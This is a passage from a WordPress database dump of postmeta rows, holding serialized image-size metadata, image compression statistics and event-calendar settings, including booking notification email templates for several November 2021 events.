mage/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:25:\"happy-crowd-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:25:\"happy-crowd-1-300x279.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"happy-crowd-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(169196,267186,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(169195,267186,'mec_display_cancellation_reason_in_single_page',''),(148871,265855,'original-file','2021/10/happy-crowd-1-updraft-pre-smush-original.jpg'),(148872,265855,'smush-complete','1'),(148873,265855,'smush-info','The file was compressed from 58.94 KB to 54.40 KB saving 7.7 percent using WP-Optimize'),(148874,265855,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:60352;s:12:\"smushed-size\";i:55703;s:15:\"savings-percent\";d:7.70000000000000017763568394002504646778106689453125;}'),(148875,265840,'original-file','2021/10/forest-2-updraft-pre-smush-original.jpg'),(148876,265840,'smush-complete','1'),(148877,265840,'smush-info','The file was compressed from 70.64 KB to 65.80 KB saving 6.85 percent using WP-Optimize'),(148878,265840,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:72333;s:12:\"smushed-size\";i:67381;s:15:\"savings-percent\";d:6.8499999999999996447286321199499070644378662109375;}'),(148879,265857,'mec_moved_online_link',''),(148880,265857,'mec_cancelled_reason',''),(148881,265857,'mec_display_cancellation_reason_in_single_page',''),(148882,265857,'boldgrid_hide_page_title','0'),(148883,265857,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(148884,265857,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-11-03\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-11-03\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(148885,265857,'mec_currency','a:0:{}'),(148886,265857,'mec_additional_organizer_ids','a:0:{}'),(148887,265857,'mec_additional_location_ids','a:0:{}'),(148888,265857,'mec_cost',''),(148889,265857,'mec_more_info_target','_self'),(148890,265857,'mec_more_info_title',''),(148891,265857,'mec_organizer_id','1'),(148892,265857,'mec_read_more',''),(148893,265857,'mec_more_info',''),(148894,265857,'mec_repeat_type',''),(148895,265857,'mec_repeat_status','0'),(148896,265857,'mec_end_day_seconds','72000'),(148897,265857,'mec_end_time_ampm','PM'),(148898,265857,'mec_end_time_minutes','0'),(148899,265857,'mec_end_time_hour','8'),(148900,265857,'mec_end_date','2021-11-03'),(148901,265857,'mec_start_day_seconds','66600'),(148902,265857,'mec_start_time_ampm','PM'),(148903,265857,'mec_start_time_minutes','30'),(148904,265857,'mec_public','1'),(148905,265857,'mec_start_date','2021-11-03'),(148906,265857,'mec_start_time_hour','6'),(148907,265857,'mec_countdown_method','global'),(148908,265857,'mec_timezone','global'),(148909,265857,'mec_comment',''),(148910,265857,'one_occurrence','0'),(148911,265857,'mec_hide_time','0'),(148912,265857,'mec_hide_end_time','0'),(148913,265857,'mec_event_status','EventScheduled'),(148914,265857,'mec_fields','a:0:{}'),(148915,265857,'mec_op','a:0:{}'),(148916,265857,'mec_bfixed_fields','a:0:{}'),(148917,265857,'mec_reg_fields','a:0:{}'),(148918,265857,'mec_reg_fields_global_inheritance','1'),(148919,265857,'mec_ticket_variations','a:0:{}'),(148920,265857,'mec_ticket_variations_global_inheritance','1'),(148921,265857,'mec_fees','a:0:{}'),(148922,265857,'mec_booking','a:0:{}'),(148923,265857,'mec_tickets','a:0:{}'),(148924,265857,'mec_fees_global_inheritance','1'),(148925,265857,'mec_hourly_schedules','a:0:{}'),(148926,265857,'mec_not_in_days',''),(148927,265857,'mec_in_days',''),(148928,265857,'mec_repeat_end_at_date',''),(148929,265857,'mec_advanced_days','a:0:{}'),(148930,265857,'passster_protection_type','password'),(148931,265857,'passster_activate_global_protection',NULL),(148932,265857,'passster_activate_protection',NULL),(148933,265857,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(148934,265857,'mec_repeat_end_at_occurrences',''),(148935,265857,'mec_repeat_end',''),(148936,265857,'mec_repeat_interval','1'),(148937,265857,'mec_allday','0'),(148938,265857,'mec_certain_weekdays','a:0:{}'),(148939,265857,'mec_dont_show_map','0'),(148940,265857,'mec_location_id','131'),(148941,265857,'mec_color',''),(148942,265857,'protect_children',''),(148943,265857,'_edit_lock','1635710391:2'),(148944,265857,'_edit_last','2'),(148945,265857,'_thumbnail_id','265858'),(148946,265858,'_wp_attached_file','2021/10/star-temple-1.jpg'),(148947,265858,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:514;s:6:\"height\";i:296;s:4:\"file\";s:25:\"2021/10/star-temple-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"star-temple-1-300x173.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:173;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"star-temple-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:25:\"star-temple-1-300x296.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:296;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:25:\"star-temple-1-474x296.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:296;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:25:\"star-temple-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:25:\"star-temple-1-300x296.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:296;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"star-temple-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(169194,267186,'mec_cancelled_reason',''),(169193,267186,'mec_moved_online_link',''),(169192,267186,'mec_event_status','EventScheduled'),(169191,267186,'mec_fields','a:0:{}'),(169190,267186,'mec_bfixed_fields','a:0:{}'),(169189,267186,'mec_public','1'),(148956,265861,'mec_moved_online_link',''),(148957,265861,'mec_cancelled_reason',''),(148958,265861,'mec_display_cancellation_reason_in_single_page',''),(148959,265861,'boldgrid_hide_page_title','0'),(148960,265861,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(148961,265861,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-11-10\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-11-10\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(148962,265861,'mec_currency','a:0:{}'),(148963,265861,'mec_additional_organizer_ids','a:0:{}'),(148964,265861,'mec_additional_location_ids','a:0:{}'),(148965,265861,'mec_cost',''),(148966,265861,'mec_more_info_target','_self'),(148967,265861,'mec_more_info_title',''),(148968,265861,'mec_organizer_id','1'),(148969,265861,'mec_read_more',''),(148970,265861,'mec_more_info',''),(148971,265861,'mec_repeat_type',''),(148972,265861,'mec_repeat_status','0'),(148973,265861,'mec_end_day_seconds','72000'),(148974,265861,'mec_end_time_ampm','PM'),(148975,265861,'mec_end_time_minutes','0'),(148976,265861,'mec_end_time_hour','8'),(148977,265861,'mec_end_date','2021-11-10'),(148978,265861,'mec_start_day_seconds','66600'),(148979,265861,'mec_start_time_ampm','PM'),(148980,265861,'mec_start_time_minutes','30'),(148981,265861,'mec_public','1'),(148982,265861,'mec_start_date','2021-11-10'),(148983,265861,'mec_start_time_hour','6'),(148984,265861,'mec_countdown_method','global'),(148985,265861,'mec_timezone','global'),(148986,265861,'mec_comment',''),(148987,265861,'one_occurrence','0'),(148988,265861,'mec_hide_time','0'),(148989,265861,'mec_hide_end_time','0'),(148990,265861,'mec_event_status','EventScheduled'),(148991,265861,'mec_fields','a:0:{}'),(148992,265861,'mec_op','a:0:{}'),(148993,265861,'mec_bfixed_fields','a:0:{}'),(148994,265861,'mec_reg_fields','a:0:{}'),(148995,265861,'mec_reg_fields_global_inheritance','1'),(148996,265861,'mec_ticket_variations','a:0:{}'),(148997,265861,'mec_ticket_variations_global_inheritance','1'),(148998,265861,'mec_fees','a:0:{}'),(148999,265861,'mec_booking','a:0:{}'),(149000,265861,'mec_tickets','a:0:{}'),(149001,265861,'mec_fees_global_inheritance','1'),(149002,265861,'mec_hourly_schedules','a:0:{}'),(149003,265861,'mec_not_in_days',''),(149004,265861,'mec_in_days',''),(149005,265861,'mec_repeat_end_at_date',''),(149006,265861,'mec_advanced_days','a:0:{}'),(149007,265861,'passster_protection_type','password'),(149008,265861,'passster_activate_global_protection',NULL),(149009,265861,'passster_activate_protection',NULL),(149010,265861,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(149011,265861,'mec_repeat_end_at_occurrences',''),(149012,265861,'mec_repeat_end',''),(149013,265861,'mec_repeat_interval','1'),(149014,265861,'mec_allday','0'),(149015,265861,'mec_certain_weekdays','a:0:{}'),(149016,265861,'mec_dont_show_map','0'),(149017,265861,'mec_location_id','131'),(149018,265861,'mec_color',''),(149019,265861,'protect_children',''),(149020,265861,'_edit_lock','1635716687:2'),(149021,265861,'_edit_last','2'),(149022,265861,'_thumbnail_id','265858'),(149023,265858,'original-file','2021/10/star-temple-1-updraft-pre-smush-original.jpg'),(149024,265858,'smush-complete','1'),(149025,265858,'smush-info','The file was compressed from 38.71 KB to 37.16 KB saving 4.01 percent using WP-Optimize'),(149026,265858,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:39637;s:12:\"smushed-size\";i:38047;s:15:\"savings-percent\";d:4.0099999999999997868371792719699442386627197265625;}'),(169188,267186,'mec_countdown_method','global'),(169187,267186,'mec_timezone','global'),(169186,267186,'one_occurrence','0'),(169184,267186,'mec_additional_organizer_ids','a:0:{}'),(169185,267186,'mec_additional_location_ids','a:0:{}'),(169182,267186,'mec_cost',''),(169183,267186,'mec_currency','a:0:{}'),(169181,267186,'mec_more_info_target','_self'),(169180,267186,'mec_more_info_title',''),(169179,267186,'mec_more_info',''),(169178,267186,'mec_read_more',''),(169177,267186,'mec_event_date_submit','20210422105713'),(169175,267186,'mec_reg_fields','a:0:{}'),(169176,267186,'mec_op','a:0:{}'),(169174,267186,'mec_reg_fields_global_inheritance','1'),(149043,265864,'mec_moved_online_link',''),(149044,265864,'mec_cancelled_reason',''),(149045,265864,'mec_display_cancellation_reason_in_single_page',''),(149046,265864,'boldgrid_hide_page_title','0'),(149047,265864,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(149048,265864,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-11-03\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-11-03\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(149049,265864,'mec_currency','a:0:{}'),(149050,265864,'mec_additional_organizer_ids','a:0:{}'),(149051,265864,'mec_additional_location_ids','a:0:{}'),(149052,265864,'mec_cost',''),(149053,265864,'mec_more_info_target','_self'),(149054,265864,'mec_more_info_title',''),(149055,265864,'mec_organizer_id','1'),(149056,265864,'mec_read_more',''),(149057,265864,'mec_more_info',''),(149058,265864,'mec_repeat_type',''),(149059,265864,'mec_repeat_status','0'),(149060,265864,'mec_end_day_seconds','72000'),(149061,265864,'mec_end_time_ampm','PM'),(149062,265864,'mec_end_time_minutes','0'),(149063,265864,'mec_end_time_hour','8'),(149064,265864,'mec_end_date','2021-11-03'),(149065,265864,'mec_start_day_seconds','68400'),(149066,265864,'mec_start_time_ampm','PM'),(149067,265864,'mec_start_time_minutes','0'),(149068,265864,'mec_public','1'),(149069,265864,'mec_start_date','2021-11-03'),(149070,265864,'mec_start_time_hour','7'),(149071,265864,'mec_countdown_method','global'),(149072,265864,'mec_timezone','global'),(149073,265864,'mec_comment',''),(149074,265864,'one_occurrence','0'),(149075,265864,'mec_hide_time','0'),(149076,265864,'mec_hide_end_time','0'),(149077,265864,'mec_event_status','EventScheduled'),(149078,265864,'mec_fields','a:0:{}'),(149079,265864,'mec_op','a:0:{}'),(149080,265864,'mec_bfixed_fields','a:0:{}'),(149081,265864,'mec_reg_fields','a:0:{}'),(149082,265864,'mec_reg_fields_global_inheritance','1'),(149083,265864,'mec_ticket_variations','a:0:{}'),(149084,265864,'mec_ticket_variations_global_inheritance','1'),(149085,265864,'mec_fees','a:0:{}'),(149086,265864,'mec_booking','a:0:{}'),(149087,265864,'mec_tickets','a:0:{}'),(149088,265864,'mec_fees_global_inheritance','1'),(149089,265864,'mec_hourly_schedules','a:0:{}'),(149090,265864,'mec_not_in_days',''),(149091,265864,'mec_in_days',''),(149092,265864,'mec_repeat_end_at_date',''),(149093,265864,'mec_advanced_days','a:0:{}'),(149094,265864,'passster_protection_type','password'),(149095,265864,'passster_activate_global_protection',NULL),(149096,265864,'passster_activate_protection',NULL),(149097,265864,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(149098,265864,'mec_repeat_end_at_occurrences',''),(149099,265864,'mec_repeat_end',''),(149100,265864,'mec_repeat_interval','1'),(149101,265864,'mec_allday','0'),(149102,265864,'mec_certain_weekdays','a:0:{}'),(149103,265864,'mec_dont_show_map','0'),(149104,265864,'mec_location_id','118'),(149105,265864,'mec_color',''),(149106,265864,'protect_children',''),(149107,265864,'_edit_lock','1635961721:2'),(149108,265864,'_edit_last','2'),(149109,265864,'_thumbnail_id','265872'),(169173,267186,'mec_ticket_variations','a:0:{}'),(169172,267186,'mec_ticket_variations_global_inheritance','1'),(169171,267186,'mec_fees','a:0:{}'),(169170,267186,'mec_fees_global_inheritance','1'),(169169,267186,'mec_tickets','a:0:{}'),(149130,265869,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(149131,265869,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-11-16\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-11-16\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(149132,265869,'mec_currency','a:0:{}'),(149133,265869,'mec_additional_organizer_ids','a:0:{}'),(149134,265869,'mec_additional_location_ids','a:0:{}'),(149135,265869,'mec_cost',''),(149136,265869,'mec_more_info_target','_self'),(149137,265869,'mec_more_info_title',''),(149138,265869,'mec_organizer_id','1'),(149139,265869,'mec_read_more',''),(149140,265869,'mec_more_info',''),(149141,265869,'mec_repeat_type',''),(149142,265869,'mec_repeat_status','0'),(149143,265869,'mec_end_day_seconds','72000'),(149144,265869,'mec_end_time_ampm','PM'),(149145,265869,'mec_end_time_minutes','0'),(149146,265869,'mec_end_time_hour','8'),(149147,265869,'mec_end_date','2021-11-16'),(149148,265869,'mec_start_day_seconds','68400'),(149149,265869,'mec_start_time_ampm','PM'),(149150,265869,'mec_start_time_minutes','0'),(149151,265869,'mec_public','1'),(149152,265869,'mec_start_date','2021-11-16'),(149153,265869,'mec_start_time_hour','7'),(149154,265869,'mec_countdown_method','global'),(149155,265869,'mec_timezone','global'),(149156,265869,'mec_comment',''),(149157,265869,'one_occurrence','0'),(149158,265869,'mec_hide_time','0'),(149159,265869,'mec_hide_end_time','0'),(149160,265869,'mec_event_status','EventScheduled'),(149161,265869,'mec_fields','a:0:{}'),(149162,265869,'mec_op','a:0:{}'),(149163,265869,'mec_bfixed_fields','a:0:{}'),(149164,265869,'mec_reg_fields','a:0:{}'),(149165,265869,'mec_reg_fields_global_inheritance','1'),(149166,265869,'mec_ticket_variations','a:0:{}'),(149167,265869,'mec_ticket_variations_global_inheritance','1'),(149168,265869,'mec_fees','a:0:{}'),(149169,265869,'mec_booking','a:0:{}'),(149170,265869,'mec_tickets','a:0:{}'),(149171,265869,'mec_fees_global_inheritance','1'),(149172,265869,'mec_hourly_schedules','a:0:{}'),(149173,265869,'mec_not_in_days',''),(149174,265869,'mec_in_days',''),(149175,265869,'mec_repeat_end_at_date',''),(149176,265869,'mec_advanced_days','a:0:{}'),(149177,265869,'passster_protection_type','password'),(149178,265869,'passster_activate_global_protection',NULL),(149179,265869,'passster_activate_protection',NULL),(149180,265869,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(149181,265869,'mec_repeat_end_at_occurrences',''),(149182,265869,'mec_repeat_end',''),(149183,265869,'mec_repeat_interval','1'),(149184,265869,'mec_allday','0'),(149185,265869,'mec_certain_weekdays','a:0:{}'),(149186,265869,'mec_dont_show_map','0'),(149187,265869,'mec_location_id','118'),(149188,265869,'mec_color',''),(149189,265869,'protect_children',''),(149190,265869,'_edit_lock','1635972987:2'),(149191,265869,'_edit_last','2'),(149192,265869,'_thumbnail_id','265870'),(149193,265870,'_wp_attached_file','2021/11/flower-center-1.jpg'),(149194,265870,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:536;s:6:\"height\";i:301;s:4:\"file\";s:27:\"2021/11/flower-center-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"flower-center-1-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"flower-center-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:27:\"flower-center-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:27:\"flower-center-1-474x301.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:301;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:27:\"flower-center-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:27:\"flower-center-1-300x301.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:301;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"flower-center-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(149195,265870,'original-file','2021/11/flower-center-1-updraft-pre-smush-original.jpg'),(149196,265870,'smush-complete','1'),